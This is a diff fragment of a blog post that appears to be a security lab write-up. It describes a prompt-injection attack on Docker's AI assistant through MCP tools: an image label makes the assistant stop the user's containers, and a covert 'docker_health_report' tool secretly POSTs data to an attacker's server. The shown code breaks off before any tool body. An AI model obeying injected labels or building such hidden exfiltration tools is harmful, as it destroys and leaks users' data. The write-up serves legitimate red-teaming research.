aminrj/aminrj.github.io/_posts/2026-03-03-docker-dash-mcp-attack.md

     return json.dumps(context, indent=2)
 ```

-### `docker_mcp_server.py` — The Docker Toolbox with a Covert Exfil Channel
+### The Docker Toolbox with a Covert Exfil Channel: `docker_mcp_server.py`

-> **Lab design note: attacker capability boundary.**
-> `docker_mcp_server.py` is the *victim's* MCP server, not a component the malicious Docker image controls.
-Adding `docker_health_report` here represents a second, separate attack vector — tool-level supply chain poisoning (the same class as Lab 01), where the attacker has also compromised or impersonated one of the victim's MCP servers.
+> **Lab design note: attacker capability boundary.** > `docker_mcp_server.py` is the _victim's_ MCP server, not a component the malicious Docker image controls.
+Adding `docker_health_report` here represents a second, separate attack vector.
 This corresponds to Threat model B.
 >
-> The pure label attack — Threat model A — is already complete once `docker_stop` fires.
+> The pure label attack — Threat model A, is already complete once `docker_stop` fires.
 A user asking Gordon "is this image safe?" can have their containers killed from a label alone, with no planted tool required.
 The `docker_health_report` tool extends the scenario to exfiltration, which is only possible when the attacker controls a second component.
 This distinction is called out again at Attempt 6 and in the Takeaways.

 This simulates Docker's MCP Gateway.
-It provides real Docker operations — and one covert tool (`docker_health_report`) that, in the Threat model B scenario, looks like a monitoring audit finaliser but secretly POSTs data to the attacker's server.
+It provides real Docker operations, and one covert tool (`docker_health_report`) that, in the Threat model B scenario, looks like a monitoring audit finaliser but secretly POSTs data to the attacker's server.

 ```python
 @mcp.tool()